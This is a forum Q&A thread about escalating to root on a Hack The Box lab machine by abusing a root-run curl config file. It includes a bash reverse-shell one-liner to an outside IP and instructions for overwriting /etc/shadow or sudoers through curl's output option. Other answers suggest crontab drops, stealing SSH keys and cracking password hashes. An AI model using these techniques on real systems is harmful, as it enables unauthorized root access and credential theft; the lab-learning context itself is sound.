# Leveraging curl to spawn a shell

Tags: bash, curl, root

So I'm doing a HTB challenge where I have leveraged the targets box use of reading a file that sets a url for `curl` in order to transverse down the directory and display the root flag in a report that is part of the exercise.

File Content: `url = file:///127.0.0.1/../../../root/root.txt`

All cool.

What I want to do is further leverage this to somehow spawn a shell by reading `/bin/bash`. I can read garbled version of `/bin/bash` in the report file but I cant figure how to execute it in a way that will give me an interactive shell.

What can I do in in order to achieve this?

EDIT:

I can create a reverse shell from my current user using bash and the below command, just cant get it to execute as I'd like from 'within' curl.

`bash -i >& /dev/tcp/192.168.1.10/8080 0>&1`

Comment: So curl is running on the target, and you can control the url it downloads?

Comment: Yes that's right. It is running as root so I want root to execute something and ideally call back to my listener or alike

Comment: Maybe something related to this https://tools.cisco.com/security/center/viewAlert.x?alertId=57918 ? CVE-2018-1000300

Comment: It is in teh vulnerable version range there. I'll check it out!

Comment: Just FYI: there's no need to include a domain name and use path traversal when doing `file://` URIs. A URI like `file:///etc/shadow` is already absolute; its parts are the `file:` scheme, the `//` separator, and the `/etc/shadow` path.

Answer (score 0, accepted):

In case anybody is interested.
The backend script was reading the file containing the url as a config file and writing as root so I changed the url and copied out the `etc/shadow` etc files and created a new user then read the edited files back the original locations, to then sudo into that user and get a shell.

I wasn't able to break out of curl itself.

I used the below method to first read the original `/etc/shadow` file and copy to a location I could view, then to edit the files with a new user and copy back.

Curl input file being from attacker being read by root

`url = my_ip:port/edited_shadow`

I added this below it for victim machine

`output = /etc/shadow`

This is roughly what I used as a guide...

http://www.hackingarticles.in/linux-privilege-escalation-using-suid-binaries/

There are of course easier ways to do this, write a new public key for example. But I wanted to try this method

Answer (score 2):

Depending on how `curl` is launched, it may be vulnerable to parameter injection. Since you control one parameter already (the URL), you might be able to use characters such as spaces and apostrophes or quotation marks to inject a `-o <file` parameter, which would cause `curl` to write its output to that file. If you can do that, there are lots of options (especially since `curl` runs as root), such as dropping a [crontab file](https://linux.die.net/man/5/crontab) with a command to invoke your program in a minute. Less likely to work but still worth checking is whether `curl` is running within a shell, in which case you may be able to use shell injection (such as backticks or `$( )` around a command) to execute an arbitrary command directly.

There is no way for reading a file to directly cause code execution. However, you could try reading files that might be useful for getting remote access to the box. For example, check the SSH authorized keys, and see whether the corresponding private keys are present on the machine; if so, steal them and use them to SSH in (though you might need to break a password on the private key first). You could also try stealing the password hashes from `/etc/shadow` and cracking them; it's a long shot but maybe there's a weak password on one account that you can guess, and then use to SSH in with password auth. Alternatively, you could try to retrieve any cloud provider credentials (AWS or similar) and use them to gain control of the host through the cloud provider's infrastructure.

Comment: In the end I just created a new user in the shadow files etc. Dropped into a shell from there

Comment: Using the output parameter? Or did you get write privileges as root some other way?

Comment: Using output. I'll edit my answer below to be more clear

Answer (score 0):

I just completed this box.

You can edit the sudoers file to give sudo permissions to the user. And then sudo your reverse shell command.

Comment: You are violating the Terms and Conditions of Hack The Box by posting solutions to machines. Please delete your answer - and maybe the question entirely.

Comment: While those T&C may be binding for that user, they are hardly binding for this site, or any other persons. I would consider such an demand extremely rude...